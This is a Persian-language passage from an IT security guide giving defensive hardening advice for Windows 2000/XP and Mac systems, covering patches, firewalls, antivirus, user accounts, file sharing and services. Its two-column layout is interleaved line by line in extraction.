‫‪ Windows 2000‬ﺩﺭ ﭘﺎﻳﮕــﺎﻩ ﺯﻳــﺮ ﻗﺎﺑــﻞ ﺩﺳﺘﺮﺳــﻲ‬ ‫ﻻ ﺑﺎﻋﺚ ﺑـﺎﻻ‬‫ﻋﻤﻠﻜﺮﺩ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﺔ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ‪:‬‬ ‫ﺭﻓﺘﻦ ﻫﺰﻳﻨﺔ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺁﻧﻬﺎ ﻣﻲﺷﻮﺩ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﺭﺩ ﺑﻤﻨﻈﻮﺭ‬
‫ﺁﺳﺎﻥ ﻛﺮﺩﻥ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮﺍﻥ ﺗﺎﺯﻩﻛﺎﺭ ﺍﺯ ﺍﺑﺰﺍﺭ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎ ﺩﺍﺭﺍﻱ‬

‫‪118 http://windowsupdate.microsoft.com‬‬
‫‪119 http://www.microsoft.com/downloads‬‬ ‫‪117 O.S. Kernel‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٠٠‬‬

‫ﺳﺨﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺩﻳﮕﺮ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ‬ ‫‪http://www.microsoft.com/windows2000‬‬


‫‪/windowsupdate/sus/‬‬
‫ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ‪ NTFS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪١٢٢‬‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪Windows 2000 ،Windows NT‬‬
‫ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻤـﺎﻣﻲ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺷـﺒﻜﻪ ﻓﻌـﺎﻝ‬ ‫‪١٢٠‬‬
‫‪ Windows‬ﻛــﻪ ﺍﺯ ﻗﺎﺑﻠﻴــﺖ ﭼﻨــﺪﻛﺎﺭﺑﺮﻱ‬ ‫ﻭ ‪XP‬‬
‫ﻫﺴﺘﻨﺪ ﺗﺎ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺘﻮﺍﻧﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﺑﺮﻗـﺮﺍﺭ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ ﻫـﻴﭻ‬
‫ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺩﺭ ﺷﺮﻛﺖ ﺧـﻮﺩ ﺷـﺒﻜﻪ ﻧﺪﺍﺭﻳـﺪ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻏﻴﺮ ﺿﺮﻭﺭﻱ ﺩﺭ ﺁﻧﻬﺎ ﺍﻳﺠﺎﺩ ﻧﺸﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻛﺎﺭﺑﺮﺩ ﻧﺪﺍﺭﻧﺪ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﻤﺎﻣﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻚ ﺭﻣﺰ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬ ‫ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ‪ -‬ﺑﺮ ﺍﺳﺎﺱ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﺳﻮﻡ ﻫﻤﻴﻦ‬
‫ﺑﺨﺶ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪ ‪ -‬ﺑﺮﺍﻱ ﺧـﻮﺩ ﺑﺮﮔﺰﻳـﺪﻩ ﺍﻧـﺪ‪ .‬ﺑـﻪ‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺭﻭﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻨﻬﺎ ﺍﻣﺘﻴﺎﺯﺍﺗﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺁﻧﻬﺎ ﺍﺳـﺖ ﺩﺍﺩﻩ‬
‫ﺳﻴﺴﺘﻢ ﺧـﻮﺩ ﻧـﺼﺐ ﻛﻨﻴـﺪ‪ .‬ﻧـﺴﺨﻪﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﺍﻳـﻦ‬
‫ﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺣﺘﻲ ﺍﮔﺮ ﺗﻨﻬﺎ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ ﺗﻮﺳـﻂ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﺩﺳﺘﺮﺱ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺭﺍ ﺑـﻪﺭﻭﺯ‬
‫ﻛﺎﺭﺑﺮ ﺍﺻﻠﻲ ﺧﻮﺩ ﺭﺍﻫﺒﺮﻱ ﺷﻮﺩ‪ ،‬ﺍﻳﻦ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ‬
‫ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﻣﻄﻤﺌﻦ ﺷـﻮﻳﺪ ﻛـﻪ ﺩﻳـﻮﺍﺭﺓ ﺁﺗـﺶ ﺑﮕﻮﻧـﻪ ﺍﻱ‬
‫ﺭﻭﺯﻣﺮﻩ ﻭ ﻣﻌﻤﻮﻟﻲ ﺧﻮﺩ ﻧﺒﺎﻳﺪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﻛﻪ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻫﺮ ﺍﺗﻔﺎﻕ ﻏﻴﺮﻋـﺎﺩﻱ ﺑـﻪ‬
‫ﻛﻨﺪ‪.‬‬
‫ﺷﻤﺎ ﻫﺸﺪﺍﺭ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‬
‫ﺿﺪﻭﻳﺮﻭﺱ‬
‫ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻳﺎ ﺍﺷﺘﺮﺍﻙ ﺧﺪﻣﺎﺕ ﭼﺎﭖ‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺧـﻮﺩ ﻧـﺼﺐ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻏﻴﺮﻓﻌـﺎﻝ ﺷـﺪﻩﺍﻧـﺪ‪.‬‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ‬
‫ﻣﺮﺍﺣﻞ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ‪ Windows Help‬ﻭ ﭘﺎﻳﮕـﺎﻩ‬
‫ﻧﺴﺨﺔ ﺗﺠﺎﺭﻱ ﺁﻧﺮﺍ ﺑﭙﺮﺩﺍﺯﻳـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮ‬
‫ﺍﻃﻼﻉﺭﺳـﺎﻧﻲ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ ﻗﺎﺑـﻞ ﺩﺳـﺘﺮﺱ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺧـﻮﺩ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻋﺒـﺎﺭﺕ ﺯﻳـﺮ ﺭﺍ ﺟـﺴﺘﺠﻮ ﻛﻨﻴـﺪ‪:‬‬
‫ﺑﺮﺧــﻲ ﺩﻳﮕــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻫﻔﺘﮕــﻲ ﺁﻧﻬــﺎ ﺭﺍ ﭘﻴــﺸﻨﻬﺎﺩ‬
‫"‪ "disable file sharing xx‬ﻛـﻪ ﺩﺭ ﺁﻥ ‪ xx‬ﻧـﺴﺨﺔ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﻫﺮﭼﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺑﻪﺭﻭﺯﺗﺮ ﺑﺎﺷﺪ ﺑﻬﺘـﺮ‬
‫ﻼ ‪ XP‬ﻳﺎ ‪ .2000‬ﺍﮔـﺮ ﺍﺯ‬‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ؛ ﻣﺜ ﹰ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪.‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﻫـﻴﭻ‬
‫ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ‬ ‫ﺍﻣﺘﻴﺎﺯ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺩﺭ ﺁﻥ ﻓﻌﺎﻝ ﻧﻴﺴﺖ‪.‬‬
‫‪١٢١‬‬
‫ﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺮﺍﻱ ﺍﻧـﻮﺍﻉ‬ ‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺟﺴﺘﺠﻮ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻣﺜﻞ‪:‬‬
‫ﺳﻴــــﺴﺘﻤﻬﺎﻱ ﻓﺎﻳــــﻞ ‪ FAT‬ﻭ ‪ FAT32‬ﻛــــﻪ ﺩﺭ‬
‫‪Pest Patrol‬‬ ‫‪ Windows‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧﺪ ﺑﻄـﻮﺭ ﻛﺎﻣـﻞ‬
‫)‪(http://www.pestpatrol.com‬‬
‫ﺍﻳﻤﻦ ﻧﻴﺴﺘﻨﺪ؛ ﺑﺨﺼﻮﺹ ﺍﮔﺮ ﺍﺯ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫‪Lavasoft‬‬
‫)‪(http://lavasoftusa.com/software/adawareplus/‬‬ ‫ﻛﻨﻴﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺍﻧﺠـﺎﻡ‬
‫‪SpybotSD‬‬ ‫ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ ‪NTFS‬‬
‫)‪(http://www.safer-networking.org‬‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﮔﺮﺩﺩ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﺳﺘﮕﺎﻩ‬
‫ﻫﻤﮕﻲ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻓـﻮﻕ ﺭﺍﻳﮕـﺎﻥ ﻫـﺴﺘﻨﺪ ﻭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ‬ ‫ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺑـﻴﺶ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﻮﺩ ﻳﺎ ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﺩﻳـﺴﻚ‬

‫‪120 Multi-User‬‬
‫‪122 System Services‬‬ ‫‪121 File System‬‬
‫‪١٠١‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬ ‫ﺑﺮﺭﺳﻲ ﺧﻼﺻﺔ ﺍﻣﻨﻴﺘﻲ‬


‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺍﺯ ﺗﻤـﺎﻣﻲ ﻭﺻـﻠﻪﻫـﺎ ﺑـﺮﺍﻱ‬ ‫ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻓﻨـﻲ ﻫـﺴﺘﻴﺪ ﻭ ﻫـﻴﭻ ﺳـﺎﺯﻣﺎﻧﻲ‬
‫ﺣﻔﺎﻇــﺖ ﺍﺯ ﺳﻴــﺴﺘﻢ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩﻩﺍﻳــﺪ‪ .‬ﺑــﻪ ﭘﺎﻳﮕــﺎﻩ‬ ‫ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻤﺎ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‬
‫ﺍﻃــﻼﻉﺭﺳــﺎﻧﻲ ‪ http://www.apple.com‬ﺑﺮﻭﻳــﺪ ﻭ‬ ‫‪ Microsoft‬ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻧﮕﺎﻫﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪:‬‬
‫ﺭﻭﻱ ﮔﺰﻳﻨﺔ ‪ Support‬ﻛﻠﻴﻚ ﻛﻨﻴﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ‬ ‫‪http://www.microsoft.com/security/home‬‬
‫‪ ،Windows‬ﺍﻳﻨﺠﺎ ﻫـﻢ ﺍﻳـﻦ ﺍﺣﺘﻤـﺎﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ‬ ‫‪http://www.microsoft.com/protect/‬‬
‫ﺳﻴﺴﺘﻢ ﺍﺻﻼﺡ ﻧﺸﺪﺓ ﺷﻤﺎ ﺑﻌﺪ ﺍﺯ ﺗﻨﻬﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻳﺎ ﭼﻨﺪ‬
‫ﺍﮔﺮ ﻣﺘﺨﺼﺺ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺭﻭﺯ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ؛ ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺭﻭﻱ ﺁﻥ ﻳـﻚ‬


‫ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪:‬‬
‫ﺍﺭﺗﺒﺎﻁ ﺩﺍﺋﻤﻲ ﺷﺒﻜﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫‪http://www.microsoft.com/technet/security‬‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬ ‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪﻱ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ‪ ١٢٣MBSA‬ﺭﺍ ﻛـﻪ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺗﻤﺎﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺑﺮﻱ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ‬ ‫ﺑــﺮﺍﻱ ﺍﺭﺍﺋــﻪ ﺧــﺪﻣﺎﺕ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺑــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ‬
‫ﻧﻴﺴﺘﻨﺪ ﻏﻴﺮﻓﻌﺎﻝ ﻳﺎ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺧﺼﻮﺻﹰﺎ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬ ‫‪ Windows 2000‬ﻭ ‪ Windows XP‬ﻃﺮﺍﺣﻲ ﺷـﺪﻩ‬
‫ﻛﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ guest‬ﺑـﺪﻭﻥ ﺩﺍﺷـﺘﻦ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬ ‫ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ‪.‬‬
‫ﻓﻌﺎﻝ ﻧﺒﺎﺷﺪ‪ .‬ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ﻣﺤـﺪﻭﺩ ﺳـﺎﺯﻳﺪ ﻭ ﺍﺯ ﺣـﺴﺎﺏ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪Macintosh‬‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻛـﻪ ﺑـﺪﻭﻥ ﺍﻣﺘﻴـﺎﺯ‬
‫ﺭﺍﻫﺒﺮﻱ ﻗﺎﺑﻞ ﺍﻧﺠﺎﻡ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪.‬‬ ‫ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪ Apple Macintosh‬ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺍﺯ‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‬
‫‪ Windows‬ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﭘﺬﻳﺮﺍﻱ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪.‬‬ ‫ﺑﻌﻼﻭﻩ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ‪ Mac‬ﻧﺴﺒﺖ ﺑـﻪ‬
‫ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺗﻌﻴـﻴﻦﺷـﺪﻩ‬ ‫ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻤﺘﺮ ﺍﺳﺖ ﻣﻬﺎﺟﻤﺎﻥ ﻋﻼﻗـﺔ ﻛﻤﺘـﺮﻱ ﺑـﻪ‬
‫ﺩﺭ ﺣﺪﺍﻗﻞ ﺳﻄﺢ ﻣﻤﻜﻦ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬ ‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﺩﺭ ﺁﻧﻬﺎ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺷﺎﻳﺪ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ‬
‫ﺁﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ‪ Mac‬ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻫﻤﻴﺸﻪ ﺍﻳﻤـﻦ‬
‫ﺧﺪﻣﺎﺕ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻫﻴﭽﮕـﺎﻩ ﻣـﻮﺭﺩ ﺁﺯﺍﺭ ﻭ ﺍﺫﻳـﺖ ﻛـﺴﻲ ﻗـﺮﺍﺭ ﻧﺨﻮﺍﻫﻨـﺪ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﺳـﺎﺯﻳﺪ‪ .‬ﺍﮔـﺮ‬ ‫ﮔﺮﻓــﺖ‪ .‬ﺳﻴــﺴﺘﻤﻬﺎﻱ ‪ MacOS‬ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ‪MacOS X‬‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﻣﻮﻗﺘﻲ ﻓﻌﺎﻝ ﻣﻲﻛﻨﻴﺪ ﻳﺎﺩﺗﺎﻥ ﺑﺎﺷﺪ ﻛﻪ ﭘـﺲ‬ ‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻧﺪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻨﺎﺳﺒﺘﺮﻱ ﺩﺍﺷﺘﻨﺪ‪ MacOS X .‬ﺑﺮ‬
‫ﺍﺯ ﺍﺗﻤﺎﻡ ﻛﺎﺭ ﻣﺠﺪﺩﹰﺍ ﻫﻤﮕﻲ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬ ‫ﺍﺳﺎﺱ ‪ FreeBSD UNIX‬ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺎ ﺩﻳﺪ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪ‬ ‫‪ UNIX‬ﺧﺎﺹ ﻛﻪ ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻪ‬
‫ﺁﻥ ﻧﮕﺎﻩ ﻛﺮﺩ )ﺍﻳﻦ ﻣـﻮﺭﺩ ﺩﺭ ﺑﺨـﺶ ﺑﻌـﺪﻱ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ ‪ UNIX‬ﺍﺳـﺖ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪ ﻣﺮﺗﺒﻂ ﺑـﺎ ﺷـﺒﻜﻪ )ﺧـﺼﻮﺻﹰﺎ‬ ‫ﺑﺮﺭﺳﻲ ﺷﺪﻩ(‪ .‬ﺩﺭ ﻫﺴﺘﺔ ﻣﺮﻛﺰﻱ ‪ MacOS X‬ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ‬
‫ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ‪ UNIX‬ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﻧـﺪ( ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬ ‫ﻣﺘﻌﺪﺩﻱ ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﻣﺎ ﻫﻤﺔ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻗﺒﻞ ﺍﺯ ‪MacOS X‬ﻫﺎ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﻛـﺮﺩﻩﺍﻳـﺪ‬ ‫ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ‬
‫ﻣﺮﺍﻗﺐ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﺎﺷﻴﺪ‪.‬‬

‫‪123 Microsoft Baseline Security Analyzer‬‬


